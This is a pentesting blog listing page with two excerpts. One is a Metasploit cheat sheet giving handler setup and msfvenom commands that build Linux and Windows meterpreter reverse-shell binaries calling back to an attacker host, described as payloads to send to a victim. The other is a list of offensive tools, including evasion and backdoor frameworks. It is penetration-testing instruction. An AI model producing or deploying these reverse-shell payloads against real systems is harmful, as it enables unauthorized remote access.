Skip to main content

Posts

Showing posts with the label Pentesting

Creating Metasploit Payloads

Creating Metasploit Payloads Metasploit - Most Used Pen Testing Tool Usually when you use metasploit, you need to create a payload and send that payload to your victim. Here is some useful command to create payload for many platform. Acronym for this post: LHOST: local host - commonly is attacker IP LPORT: local port - default is 4444 RHOST: remote host - commonly is victim IP [Handlers] Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format. use exploit/multi/handler set PAYLOAD <Payload name> set LHOST <LHOST value> set LPORT <LPORT value> set ExitOnSession false exploit -j -z [List payloads] msfvenom -l [Binaries] Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Addr...
Post a Comment
Read more

Most powerful tool I usually use in pentesting

[*] Today, I'm gonna share list of tool that I usually use while pentesting. Infomation Gathering and Reconnaisance Sn1per Datasploit Discover script Recon-ng Google Hacking Maltegoce Scanning  Nmap Knockpy Dirb Dirsearch Masscan Nessus Acunetix Exploitation Metasploit Sqlmap Burp Suite TheFatRat Veil-Evasion Custom script on Internet such as Exploit-DB Maintain Access Backdoor factory Netcat Empire
Post a Comment
Read more